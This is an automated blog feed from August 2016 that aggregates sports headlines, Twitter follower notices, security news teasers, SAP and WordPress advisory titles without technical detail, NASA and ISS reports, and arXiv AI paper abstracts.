Latest YouTube Video

Saturday, August 20, 2016

Orioles: C Matt Wieters placed on paternity leave list; P Odrisamer Despaigne, C Francisco Pena recalled from Triple-A (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

I have a new follower on Twitter


Java Next Generation
Sourcing Java Talent for exclusive roles in Dublin, Ireland the Tech Hub of Europe. Positions Recruited by @NextGenRecruit
Dublin City, Ireland
https://t.co/xmhgEvXNej
Following: 1815 - Followers: 2861

August 20, 2016 at 12:49PM via Twitter http://twitter.com/java_ng

Does your WebCam Crash after Windows 10 Anniversary Update? Here’s How to Fix It

If your webcam has stopped working after installing recently-released Microsoft's big Anniversary Update for Windows 10, you are not alone. With some significant changes to improve Windows experience, Windows 10 Anniversary Update includes the support for webcams that has rendered a number of different webcams inoperable, causing serious issues for not only consumers but also the enterprise.


from The Hacker News http://ift.tt/2btw9Pm
via IFTTT

Emotions Anonymous

Emotions Anonymous. Tuesday, September 6, 2016 -. 6:00pm to 8:00pm. San Marco Branch Library. exploring emotions; negative to positive.

from Google Alert - anonymous http://ift.tt/2b67eCg
via IFTTT

So it is a pumpkin!


via Instagram http://ift.tt/2bSv6cq

Leaked Exploits are Legit and Belong to NSA: Cisco, Fortinet and Snowden Docs Confirm

Last week, a group calling itself "The Shadow Brokers" published what it said was a set of NSA "cyber weapons," including some working exploits for the Internet's most crucial network infrastructure, apparently stolen from the agency's Equation Group in 2013. Well, talking about the authenticity of those exploits, The Intercept published Friday a new set of documents from the Edward Snowden


from The Hacker News http://ift.tt/2bt1jX6
via IFTTT

[FD] Path traversal vulnerability in WordPress Core Ajax handlers

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

Lambda (anonymous/first class procedures) and custom reporters

Beetle Blocks (A program similar to Scratch for making 3D graphics) has the report block. It's a cap block. This is how it looks like: report () :: cap grey

from Google Alert - anonymous http://ift.tt/2bEG81u
via IFTTT

Perseid Fireball at Sunset Crater


On the night of August 12, this bright Perseid meteor flashed above volcanic Sunset Crater National Monument, Arizona, USA, planet Earth. Streaking along the summer Milky Way, its initial color is likely due to the shower meteor's characteristically high speed. Entering at 60 kilometers per second, Perseid meteors are capable of exciting green emission from oxygen atoms while passing through the tenuous atmosphere at high altitudes. Also characteristic of bright meteors, this Perseid left a visibly glowing persistent train. Its evolution is seen over a three minute sequence (left to right) spanning the bottom of the frame. The camera ultimately captured a dramatic timelapse video of the twisting, drifting train. via NASA http://ift.tt/2byQIpz

Study Domain for the Arctic-Boreal Vulnerability Experiment

Climate change in the Arctic and Boreal region is unfolding faster than anywhere else on Earth, resulting in reduced Arctic sea ice, thawing of permafrost soils, decomposition of long- frozen organic matter, widespread changes to lakes, rivers, coastlines, and alterations of ecosystem structure and function. NASA's Terrestrial Ecology Program is conducting a major field campaign, the Arctic-Boreal Vulnerability Experiment (ABoVE), in Alaska and western Canada, for 8 to 10 years, starting in 2015. ABoVE seeks a better understanding of the vulnerability and resilience of ecosystems and society to this changing environment. The image shown here outlines the core region of the study domain in red and the extended region of the study domain in purple. ABoVE's science objectives are broadly focused on (1) gaining a better understanding of the vulnerability and resilience of Arctic and boreal ecosystems to environmental change in western North America, and (2) providing the scientific basis for informed decision-making to guide societal responses at local to international levels. Research for ABoVE will link field-based, process-level studies with geospatial data products derived from airborne and satellite sensors, providing a foundation for improving the analysis, and modeling capabilities needed to understand and predict ecosystem responses and societal implications. The background shown over the study region is a spatially complete view of the vegetation greenness change for all of Canada and Alaska obtained by calculating per-pixel NDVI trend from all available 1984-2012 peak-summer Landsat-5 and -7 surface reflectance data, establishing the mid-Summer greenness trend. More information on this NDVI trend can be found here.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/2boh0N9
via IFTTT

Arctic Sea Ice from March to August 2016

Satellite-based passive microwave images of the sea ice have provided a reliable tool for continuously monitoring changes in the Arctic ice since 1979. Every summer the Arctic ice cap melts down to what scientists call its "minimum" before colder weather begins to cause ice cover to increase. The first six months of 2016 have been the warmest first half of any year in our recorded history of surface temperature (which go back to 1880). Data shows that the Arctic temperature increases are much bigger, relatively, than the rest of the globe. The Japan Aerospace Exploration Agency (JAXA) provides many water-related products derived from data acquired by the Advanced Microwave Scanning Radiometer 2 (AMSR2) instrument aboard the Global Change Observation Mission 1st-Water "SHIZUKU" (GCOM-W1) satellite. Two JAXA datasets used in this animation are the 10-km daily sea ice concentration and the 10 km daily 89 GHz Brightness Temperature. In this animation, the daily Arctic sea ice and seasonal land cover change progress through time, from the prior sea ice maximum March 24, 2016, through August 13, 2016. Over the water, Arctic sea ice changes from day to day showing a running 3-day minimum sea ice concentration in the region where the concentration is greater than 15. The blueish white color of the sea ice is derived from a 3-day running minimum of the AMSR2 89 GHz brightness temperature. Over the terrain, monthly data from the seasonal Blue Marble Next Generation fades slowly from month to month.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/2b4CAYS
via IFTTT

Friday, August 19, 2016

Guest checkout card is saved and exposed to any other anonymous users

When a guest user checks out his/her card gets saved with UID 0. Any other guest checking out after that will see the card's last 4 digits.

from Google Alert - anonymous http://ift.tt/2bAvd86
via IFTTT

[FD] Onapsis Security Advisory ONAPSIS-2016-038: SAP HANA Information disclosure in EXPORT

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] Onapsis Security Advisory ONAPSIS-2016-040: SAP HANA potential wrong encryption

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] Onapsis Security Advisory ONAPSIS-2016-037: SAP HANA Potential Remote Code Execution

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] Onapsis Security Advisory ONAPSIS-2016-034: SAP TREX remote command execution

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] Onapsis Security Advisory ONAPSIS-2016-033: SAP TREX TNS Information Disclosure in NameServer

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] Onapsis Security Advisory ONAPSIS-2016-027: SAP HANA User information disclosure

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

Ravens: Terrell Suggs cut out fried chicken, pizza, gefilte fish to get into best shape of his career - Jamison Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

[FD] Onapsis Security Advisory ONAPSIS-2016-026: SAP HANA SYSTEM user brute force attack

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] Onapsis Security Advisory ONAPSIS-2016-024: SAP HANA arbitrary audit injection via HTTP requests

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] Onapsis Security Advisory ONAPSIS-2016-025: SAP HANA arbitrary audit injection via SQL protocol

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] Onapsis Security Advisory ONAPSIS-2016-022: SAP TREX Arbitrary file write

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] Onapsis Security Advisory ONAPSIS-2016-021: SAP TREX Remote file read

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] Onapsis Security Advisory ONAPSIS-2016-020: SAP TREX Remote Directory Traversal

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] Onapsis Security Advisory ONAPSIS-2016-019: SAP TREX Remote Command Execution

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] Onapsis Security Advisory ONAPSIS-2016-007: SAP HANA Password Disclosure

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

ISS Daily Summary Report – 08/18/2016

Mouse Epigenetics Cage Unit Maintenance: The crew completed standard maintenance activities for the Mouse Epigenetics experiment by refilling the Transportation Cage Units with water and checking the water nozzles of the individual cages. The Mouse Epigenetics investigation studies altered gene expression patterns in the organs of male mice that spend one month in space, and also examines changes in the deoxyribonucleic acid (DNA) of their offspring. Results from the investigation identify genetic alterations that happen after exposure to the microgravity environment of space. Extravehicular Activity (EVA) Preparations: The crew spent most of the day preparing for tomorrow’s EVA,  completing the following: Configured/audited tools and prepared the Equipment Lock (EL), Extravehicular Mobility Units (EMUs) and ancillary hardware. Removed/relocated stowage from the Node 2 forward port endcone to access the forward International Docking Adapter (IDA) control panel. Set up the IDA control panel and 2 multimeters for the Modified Androgynous Peripheral Attachment System (MAPAS) installation. Copied EMU/Airlock contingency procedures to their iPads in the event the Station Support Computer (SSC) goes down. Pre-EVA health check. Pre-EVA conference with ground teams. International Docking Adapter (IDA): Ground controllers used the Space Station Remote Manipulator System (SSRMS) to inspect the sealing surface of IDA2, and then successfully extracted the IDA from the Dragon trunk overnight.   There was a delay in the removal when a tethered pyro bolt from the Latch B Flight Support Equipment (FSE) floated very close to the IDA handrail.  A video inspection of the handrail confirmed that the tether was not looped around or through the handrail.  The ground team continued with the IDA extraction but the FSE bolt interfered with the bottom of the handrail and the IDA structure.   The FSE bolt was freed after a sequence of adjustments with the Special Purpose Dexterous Manipulator (SPDM) robotic arm.  The adjustments were very minor and positive margin between the IDA and Dragon were verified prior to each adjustments.  The IDA was maneuvered to position for the installation on Pressurized Mating Adapter (PMA) 2 during the spacewalk tomorrow morning.  MERLIN-1 False Fire Indication:  MERLIN-1 was unpowered following a false fire indication.  Crew members took Compound Specific Analyzer- Combustion Products (CSA-CP) readings which were all zero.  Ground teams are investigating the cause.  No loss of science was incurred, as MERLIN-1 is located in the Node 1 Galley area and is used primarily for crew preference items. Today’s Planned Activities All activities were completed unless otherwise noted. ISS crew and ГОГУ (RSA Flight Control Management Team) weekly conference r/g 3090 FAGEN. Photography during fixation of samples / r/g 3118 FAGEN. Fixation of samples from MCK No.4 and setup in SM r/g 3117 CARDIOVECTOR. Experiment Ops r/g 3115 MOUSE Hardware Setup ABOUT GAGARIN FROM SPACE. HAM Radio Session Leaders Club / r/g 3114 Pre-EVA Crew Health Status – Prep Pre-EVA Crew Health Status – CMO Pre-EVA Crew Health Status – Subject Pille Sensors setup for USOS EVA / r/g 3120 CARDIOVECTOR. Photography of the Experiment Ops / r/g 3116 UDOD. Experiment Ops with DYKNANIYE-1 and SPRUT-2 Sets r/g 3119 Collecting surface samples from SM equipment and structures / r/g 3084 PHS hardware stow (Periodic Health Status) ABOUT GAGARIN FROM SPACE. HAM Radio Session Leaders Club / r/g 3114 XF305 Camcorder Settings Adjustment Mouse Epigenetics, Transportation Cage Unit, Troubleshooting, Part 1 Kulonovskiy Kristall Experiment Run. Tagup with specialists / r/g 3123 EVA Tool Config KULONOVSKIY KRISTALL. Copy and Downlink Data / r/g 3123 EVA Procedure Review On MCC Go Installation of a new upgraded СЗУ-ЦУ8 device at FGB БР-9ЦУ-8 system ЗУ1А operation site r/g 3095 Equipment Lock Preparation USOS EVA Tool Audit Final printout of EVA procedures EVA Procedure Conference On MCC Go: Replacement of ЗУ1Б ЭА025М device with the upgraded FGB БР-9ЦУ-8 device r/g 3095 Collecting surface samples from SM equipment and structures / r/g 3084 US EVA, NODE2 Ops in Preparation for International Docking Adapter (IDA) Installation OTKLIK. Hardware Monitoring / r/g 1588 СОЖ Maintenance Private medical conference before EVA from USOS Replacement of CO2 Filter Unit ИК0501 ISS-HAM Radio Session On-orbit hearing assessment using EARQ Progress 432 [OA] Stowage Ops with IMS Support / r/g 3122 CUCU EVA Inhibits Countermeasures System (CMS), Sprint Exercise, Optional Multimeter and Camcorder Setup in N2 in preparation for IDA Installation Physical Fitness Evaluation (on the treadmill) r/g 3100 IDENTIFICATION. Copy ИМУ-Ц micro-accelerometer data to laptop / r/g 1589 INTERACTION-2. Experiment Ops / r/g 3113 ISS HAM RADIO Power Down Private medical conference before EVA from USOS On-orbit hearing assessment using EARQ  Completed Task List Items None  Ground Activities All activities were completed unless otherwise noted. EVA procedures review IDA multimeter startup Nominal ground commanding Three-Day Look Ahead: Friday, 08/19: IDA2 EVA Saturday, 08/20: Post EVA cleanup activities, EVA debrief, Heart Cells media change, Mouse cage maintenance, CMO OBT Sunday, 08/21: Crew off duty QUICK ISS Status – Environmental Control Group:                               Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) On [СКВ] 2 – SM Air Conditioner System (“SKV2”) Off Carbon Dioxide Removal Assembly (CDRA) Lab Operate Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Idle Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Standby Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up

from ISS On-Orbit Status Report http://ift.tt/2blKdrH
via IFTTT

Warning — Bitcoin Users Could Be Targeted by State-Sponsored Hackers

Another day, another bad news for Bitcoin users. A leading Bitcoin information site is warning users that an upcoming version of the Blockchain consolidation software and Bitcoin wallets could most likely be targeted by "state-sponsored attackers." Recently, one of the world's most popular cryptocurrency exchanges, Bitfinex, suffered a major hack that resulted in a loss of around $72 Million


from The Hacker News http://ift.tt/2bn55g9
via IFTTT

Omegle, the Popular 'Chat with Strangers' Service Leaks Your Dirty Chats and Personal Info

Ever since the creation of online chat rooms and then social networking, people have changed the way they interact with their friends and associates. However, when it comes to anonymous chatting services, you don't even know what kinds of individuals you are dealing with. Sharing identifiable information about yourself with them could put you at risk of becoming a victim of stalking,


from The Hacker News http://ift.tt/2b1RmiJ
via IFTTT

Perseid Night at Yosemite


The 2016 Perseid meteor shower performed well on the night of August 11/12. The sky on that memorable evening was recorded from a perch overlooking Yosemite Valley, planet Earth, in this scene composed of 25 separate images selected from an all-night set of sequential exposures. Each image contains a single meteor and was placed in alignment using the background stars. The digital manipulation accounts for the Earth's rotation throughout the night and allows the explosion of colorful trails to be viewed in perspective toward the shower's radiant in the constellation Perseus. The fading alpenglow gently lights the west face of El Capitan just after sunset. Just before sunrise, a faint band zodiacal light, or the false dawn, shines upward from the east, left of Half Dome at the valley's far horizon. Car lights illuminate the valley road. Of course, the image is filled with other celestial sights from that Perseid night, including the Milky Way and the Pleiades star cluster. via NASA http://ift.tt/2bE9HTf

How to hack Online Head Ball with latest cheat tool in ipad mini

Anonymous. Shift. Advance. Grow. My Activity. Anonymous is hosting How to hack Online Head Ball with latest cheat tool in ipad mini 9 mins ago ...

from Google Alert - anonymous http://ift.tt/2bxHpq9
via IFTTT

Prompt Electron Acceleration in the Radiation Belts

On March 17, 2016, Van Allen Probe A detected a pulse of high energy electrons in the radiation belts, generated by the impact of a recent coronal mass ejection striking Earth's magnetosphere. The gradient drift speed of the electron pulse was high enough, that it propagated completely around Earth and was detected by the spacecraft again as the pulse spread out in the radiation belt. Because the particles have a range of energies, the pulse spread out as it moved around Earth, generating a weaker signal the next time it hit the spacecraft.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/2bkfA68
via IFTTT

Thursday, August 18, 2016

Orioles Video: Manny Machado and Chris Davis slug back-to-back home runs in the 6th inning of 13-5 blowout vs. Astros (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

I have a new follower on Twitter


Benny V
Going to save this world & take us to another, watch. |#Engineer |#Developer |#Science, #Tech, #Culture, & #Data lover | Web & App Developer at BluePrint
Atlanta, GA
https://t.co/Dmj83J7nvl
Following: 1734 - Followers: 12511

August 18, 2016 at 09:39PM via Twitter http://twitter.com/OyeBenny

Anonymous donor gives money to library in honor of late Harlan Co. teen

(WYMT) - An anonymous donor gave $2,500 to the Evarts Public Library in honor of a Harlan County teen who died years ago. The library found out ...

from Google Alert - anonymous http://ift.tt/2b5rw9h
via IFTTT

Effective Multi-step Temporal-Difference Learning for Non-Linear Function Approximation. (arXiv:1608.05151v1 [cs.AI])

Multi-step temporal-difference (TD) learning, where the update targets contain information from multiple time steps ahead, is one of the most popular forms of TD learning for linear function approximation. The reason is that multi-step methods often yield substantially better performance than their single-step counter-parts, due to a lower bias of the update targets. For non-linear function approximation, however, single-step methods appear to be the norm. Part of the reason could be that on many domains the popular multi-step methods TD($\lambda$) and Sarsa($\lambda$) do not perform well when combined with non-linear function approximation. In particular, they are very susceptible to divergence of value estimates. In this paper, we identify the reason behind this. Furthermore, based on our analysis, we propose a new multi-step TD method for non-linear function approximation that addresses this issue. We confirm the effectiveness of our method using two benchmark tasks with neural networks as function approximation.



from cs.AI updates on arXiv.org http://ift.tt/2bjNhEW
via IFTTT

Accelerating Exact and Approximate Inference for (Distributed) Discrete Optimization with GPUs. (arXiv:1608.05288v1 [cs.AI])

Discrete optimization is a central problem in artificial intelligence. The optimization of the aggregated cost of a network of cost functions arises in a variety of problems including (W)CSP, DCOP, as well as optimization in stochastic variants such as Bayesian networks. Inference-based algorithms are powerful techniques for solving discrete optimization problems, which can be used independently or in combination with other techniques. However, their applicability is often limited by their compute intensive nature and their space requirements. This paper proposes the design and implementation of a novel inference-based technique, which exploits modern massively parallel architectures, such as those found in Graphical Processing Units (GPUs), to speed up the resolution of exact and approximated inference-based algorithms for discrete optimization. The paper studies the proposed algorithm in both centralized and distributed optimization contexts. The paper demonstrates that the use of GPUs provides significant advantages in terms of runtime and scalability, achieving up to two orders of magnitude in speedups and showing a considerable reduction in execution time (up to 345 times faster) with respect to a sequential version.



from cs.AI updates on arXiv.org http://ift.tt/2bN5yh6
via IFTTT

Probabilistic Data Analysis with Probabilistic Programming. (arXiv:1608.05347v1 [cs.AI])

Probabilistic techniques are central to data analysis, but different approaches can be difficult to apply, combine, and compare. This paper introduces composable generative population models (CGPMs), a computational abstraction that extends directed graphical models and can be used to describe and compose a broad class of probabilistic data analysis techniques. Examples include hierarchical Bayesian models, multivariate kernel methods, discriminative machine learning, clustering algorithms, dimensionality reduction, and arbitrary probabilistic programs. We also demonstrate the integration of CGPMs into BayesDB, a probabilistic programming platform that can express data analysis tasks using a modeling language and a structured query language. The practical value is illustrated in two ways. First, CGPMs are used in an analysis that identifies satellite data records which probably violate Kepler's Third Law, by composing causal probabilistic programs with non-parametric Bayes in under 50 lines of probabilistic code. Second, for several representative data analysis tasks, we report on lines of code and accuracy measurements of various CGPMs, plus comparisons with standard baseline solutions from Python and MATLAB libraries.



from cs.AI updates on arXiv.org http://ift.tt/2bjNbNF
via IFTTT

On the expressive power of deep neural networks. (arXiv:1606.05336v3 [stat.ML] UPDATED)

We study the effects of the depth and width of a neural network on its expressive power. Precise theoretical and experimental results are derived in the generic setting of neural networks after random initialization. We find that three different measures of functional expressivity: number of transitions (a measure of non-linearity/complexity), network activation patterns (a new definition with an intrinsic link to hyperplane arrangements in input space) and number of dichotomies, show an exponential dependence on depth but not width. These three measures are related to each other, and, are also directly proportional to a fourth quantity, trajectory length. Most crucially, we show, both theoretically and experimentally, that trajectory length grows exponentially with depth, which is why all three measures display an exponential dependence on depth.

These results also suggest that parameters earlier in the network have greater influence over the expressive power of the network. So for any layer, its influence on expressivity is determined by the remaining depth of the network after that layer, which is supported by experiments on fully connected and convolutional networks on MNIST and CIFAR-10.



from cs.AI updates on arXiv.org http://ift.tt/1tznj7m
via IFTTT

A Convolutional Autoencoder for Multi-Subject fMRI Data Aggregation. (arXiv:1608.04846v1 [stat.ML])

Finding the most effective way to aggregate multi-subject fMRI data is a long-standing and challenging problem. It is of increasing interest in contemporary fMRI studies of human cognition due to the scarcity of data per subject and the variability of brain anatomy and functional response across subjects. Recent work on latent factor models shows promising results in this task but this approach does not preserve spatial locality in the brain. We examine two ways to combine the ideas of a factor model and a searchlight based analysis to aggregate multi-subject fMRI data while preserving spatial locality. We first do this directly by combining a recent factor method known as a shared response model with searchlight analysis. Then we design a multi-view convolutional autoencoder for the same task. Both approaches preserve spatial locality and have competitive or better performance compared with standard searchlight analysis and the shared response model applied across the whole brain. We also report a system design to handle the computational challenge of training the convolutional autoencoder.



from cs.AI updates on arXiv.org http://ift.tt/2b2i1L3
via IFTTT

[FD] Onapsis Security Advisory ONAPSIS-2016-006: SAP HANA Get Topology Information

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

Anonymous

Anonymous · wordpress-2 | 17th August 2016. Was followed to my hotel in SE Asia on a solo business trip by an older man. He started talking to me ...

from Google Alert - anonymous http://ift.tt/2blHlsW
via IFTTT

Microsoft Open Sources PowerShell; Now Available for Linux and Mac OS X

'Microsoft loves Linux' and this has never been so true than now. Microsoft today made its PowerShell scripting language and command-line shell available to the open source developer community on GitHub under the permissive MIT license. <!-- adsense --> The company has also launched alpha versions of PowerShell for Linux (specifically Red Hat, Ubuntu, and CentOS) and Mac OS X, in addition,


from The Hacker News http://ift.tt/2b262Q6
via IFTTT

I have a new follower on Twitter


AthelstanSearch
Analytics Talent in FinTech. #Analytics #FinTech #Athelstan
London
https://t.co/zMFXpNe9Qp
Following: 2456 - Followers: 827

August 18, 2016 at 09:25AM via Twitter http://twitter.com/AthelstanSearch

ISS Daily Summary Report – 08/17/2016

Fluid Shifts Operations In the Service Module: With ground team assistance, crewmembers performed Fluid Shifts Imaging exams by configuring the Optical Coherence Tomography (OCT) and the Distortion Product Otoacoustic Emission (DPOAE) hardware, before completing a DPOAE test, OCT exam, and a Tonometry exam. The purpose of this investigation is to characterize the space flight-induced fluid shift, including intra- and extravascular shifts, intra- and extracellular shifts, changes in total body water and lower vs. upper body shifts. Results from this investigation are expected to help define the causes of the ocular structure and vision changes associated with long duration space flight, and assist in the development of countermeasures.  Biological Research in Canisters Natural Products (BRIC-NP) Cold Stowage Preparation: The crew retrieved the BRIC-NP canisters from EXPRESS Rack 2 and inserted them in the Glacier for return on SpX-9. The BRIC-NP investigation, radiation-tolerant fungal strains isolated from the Chernobyl nuclear power plant are exposed to spaceflight conditions on board the ISS, then screened for the biological production of beneficial medical or agricultural substances.  eValuatIon And monitoring of microBiofiLms insidE the ISS (ViABLE) Payload Return:  The crew photographed all four ViABLE Bags inside the Functional Cargo Block (FGB) locker before removing and inserting each one into separate ViABLE Return Bags and placing them into Ziploc bags for return on SpX-9. ViABLE involves the evaluation of microbial biofilm development on metallic and textile space materials located inside and on the cover of Nomex pouches. Microbial biofilms are known for causing damage and contamination on the Mir space station and the ISS.  The potential application of novel methodologies and products to treat space materials may lead to improvements in the environmental quality of confined human habitats in space and on earth. Habitability Human Factors Directed Observations: The crew recorded and submitted a walk-through video documenting observations of life onboard ISS, providing insight related to human factors and habitability. The Habitability investigation collects observations about the relationship between crew members and their environment on the ISS. Observations can help spacecraft designers understand how much habitable volume is required, and whether a mission’s duration impacts how much space crew members need. Dose Tracker: The Dose Tracker app was configured and the crew completed entries for medication tracking on an iPad. This investigation documents the medication usage of crewmembers before and during their missions by capturing data regarding medication use during spaceflight, including side effect qualities, frequencies and severities. The data is expected to either support or counter anecdotal evidence of medication ineffectiveness during flight and unusual side effects experienced during flight. It is also expected that specific, near-real-time questioning about symptom relief and side effects will provide the data required to establish whether spaceflight-associated alterations in pharmacokinetics (PK) or pharmacodynamics (PD) is occurring during missions.  Oxygen Generation System (OGS) Hydrogen (H2) Sensor Remove & Replace (R&R): The crew completed OGS H2 sensor Orbital Replacement Unit (ORU) purge adapter operations, R&R of the H2 sensor ORU and AAA cleaning with inlet inspection and cleaning. This activity was scheduled due to ORU end-of-life.  Urine Processing Assembly (UPA) Sample Collection: The UPA Distillate Filter and Purge Filter were removed and replaced for return samples in support of the UPA elevated conductivity investigation.  The preceding UPA process cycle had elevated conductivity levels and the samples will help ground teams understand the difference in conductivity with the purge line reconnected.  Waste and Hygiene Compartment (WHC) Check Separator Light: To isolate the cause of Check Separator Light illumination, the crew performed an inspection of the hoses and electrical connections on the Urine Receptacle. They reported that the electrical cable on the Urine Receptacle was coiled tightly and may be kinked. They removed the zip tie that was holding the cable together to allow more slack and demated/remated the XT2 connector. Additional troubleshooting steps are in work for the crew to perform as a result of yesterday’s Flight Investigation Team (FIT) recommendations. Extravehicular Robotics Operations: Yesterday afternoon, Robotics Ground Controllers maneuvered the Space Station Remote Manipulator System (SSRMS) to unstow the Special Purpose Dexterous Manipulator (SPDM).  Following SPDM unstow, they maneuvered the SSRMS to position it over the SpX-9 Dragon Trunk and configured the SPDM to extract the International Docking Adapter 2 (IDA2) from the trunk later today. SPDM checkouts were also completed in preparation for the IDA2 Extravehicular Activity (EVA) this Friday. Today’s Planned Activities All activities were completed unless otherwise noted. Calf Volume Measurement / r/g 3080 FLUID SHIFTS. Comm configuration for the experiment /  r/g 9995 FLUID SHIFTS. Gathering and Connecting Equipment for TV coverage Soyuz 731 Samsung Tablet Recharge, initiate Biological Research in Canisters Natural Products Stowage Preparation Study of veins in lower extremities / r/g 3081 Microgravity Science Glovebox (MSG) Video file transfer to flash drive BRICNP. Sample Insertion into Glacier OGA Hydrogen Sensor R&R Collecting surface samples from FGB equipment and structures / r/g 3083 Oxygen Generation System (OGS) Hydrogen Sensor ORU Purge Adapter (HOPA) Operations FLUID SHIFTS. OCT Hardware Setup in SM FLUID SHIFTS. Connecting [OCT] Laptop to BRI r/g 3104 DOSETRK iPad data entry DRAGON. Transfers RSS2 Laptop SW Upgrade for Auto Data Downlink via RSPI r/g 3105 FLUID SHIFTS. OCT Power up in SM Printing Housekeeping Procedure DOSETRK Questionnaire Completion Soyuz 720 Samsung Tablet Recharge, Initiate Soyuz 731 Samsung Tablet Recharge, – Terminate FLUID SHIFTS. DPOAE Setup in SM FLUID SHIFTS. Operator Assistance with Chibis and Gamma-1 r/g 3103 FLUID SHIFTS. Chibis Setup / r/g 3103 FLUID SHIFTS. TONO Hardware setup in SM OGA Hydrogen Sensor R&R, Part 2 FLUID SHIFTS. Data Gathering in the SM, Subject FLUID SHIFTS. Gathering Data in SM, Operator Installation of ЗУ1А and Replacement of ЗУ1Б БР-9ЦУ-8 in FGB, Prep for Work, Clearing FGB panels r/g 3095 Fluid Shifts DPOAE Data Recovery FLUID SHIFTS. Chibis Closeout Ops / r/g 3103 Water Recovery System Waste Water Tank Drain, Initiate IMS Delta File Prep IFM IMV Cleaning FLUID SHIFTS. TONO SM Stowage FLUID SHIFTS. OCT Power off in SM OGA Hydrogen Sensor Cleaning FLUID SHIFTS. Disconnecting OCT Laptop r/g 3106 DRAGON. Cargo Transfer Tagup […]

from ISS On-Orbit Status Report http://ift.tt/2b3nSzD
via IFTTT

Meet the Lawyer Who Defends Anonymous

You know Anonymous, the hacktivist group that performs cyber ops to advance social and political change. Now, meet Jay Leiderman, the ...

from Google Alert - anonymous http://ift.tt/2b6Aip8
via IFTTT

de la soul and the anonymous nobody

We are De La Soul. Preorder our new album.

from Google Alert - anonymous http://ift.tt/2beYqHY
via IFTTT

network-anonymous-tor

network-anonymous-tor is a Haskell API for Tor anonymous networking. Depends on: attoparsec, base, base32string, bytestring, exceptions, hexstring ...

from Google Alert - anonymous http://ift.tt/2b0T6Uz
via IFTTT

Wednesday, August 17, 2016

I have a new follower on Twitter


VCCC
Musician / Producer
Manchester, England
https://t.co/2WKA5MLVQG
Following: 350 - Followers: 293

August 17, 2016 at 11:55PM via Twitter http://twitter.com/VCCC_album

Dynamic Collaborative Filtering with Compound Poisson Factorization. (arXiv:1608.04839v1 [cs.LG])

Model-based collaborative filtering analyzes user-item interactions to infer latent factors that represent user preferences and item characteristics in order to predict future interactions. Most collaborative filtering algorithms assume that these latent factors are static, although it has been shown that user preferences and item perceptions drift over time. In this paper, we propose a conjugate and numerically stable dynamic matrix factorization (DCPF) based on compound Poisson matrix factorization that models the smoothly drifting latent factors using Gamma-Markov chains. We propose a numerically stable Gamma chain construction, and then present a stochastic variational inference approach to estimate the parameters of our model. We apply our model to time-stamped ratings data sets: Netflix, Yelp, and Last.fm, where DCPF achieves a higher predictive accuracy than state-of-the-art static and dynamic factorization models.



from cs.AI updates on arXiv.org http://ift.tt/2b2hb0A
via IFTTT

Towards Music Captioning: Generating Music Playlist Descriptions. (arXiv:1608.04868v1 [cs.MM])

Descriptions are often provided along with recommendations to help users' discovery. Recommending automatically generated music playlists (e.g. personalised playlists) introduces the problem of generating descriptions. In this paper, we propose a method for generating music playlist descriptions, which is called as music captioning. In the proposed method, audio content analysis and natural language processing are adopted to utilise the information of each track.



from cs.AI updates on arXiv.org http://ift.tt/2boDSNF
via IFTTT

Open Problem: Approximate Planning of POMDPs in the class of Memoryless Policies. (arXiv:1608.04996v1 [cs.AI])

Planning plays an important role in the broad class of decision theory. Planning has drawn much attention in recent work in the robotics and sequential decision making areas. Recently, Reinforcement Learning (RL), as an agent-environment interaction problem, has brought further attention to planning methods. Generally in RL, one can assume a generative model, e.g. graphical models, for the environment, and then the task for the RL agent is to learn the model parameters and find the optimal strategy based on these learnt parameters. Based on environment behavior, the agent can assume various types of generative models, e.g. Multi Armed Bandit for a static environment, or Markov Decision Process (MDP) for a dynamic environment. The advantage of these popular models is their simplicity, which results in tractable methods of learning the parameters and finding the optimal policy. The drawback of these models is again their simplicity: these models usually underfit and underestimate the actual environment behavior. For example, in robotics, the agent usually has noisy observations of the environment inner state and MDP is not a suitable model.

More complex models like Partially Observable Markov Decision Process (POMDP) can compensate for this drawback. Fitting this model to the environment, where the partial observation is given to the agent, generally gives dramatic performance improvement, sometimes unbounded improvement, compared to MDP. In general, finding the optimal policy for the POMDP model is computationally intractable and fully non convex, even for the class of memoryless policies. The open problem is to come up with a method to find an exact or an approximate optimal stochastic memoryless policy for POMDP models.



from cs.AI updates on arXiv.org http://ift.tt/2bfQIwm
via IFTTT

Practical optimal experiment design with probabilistic programs. (arXiv:1608.05046v1 [cs.AI])

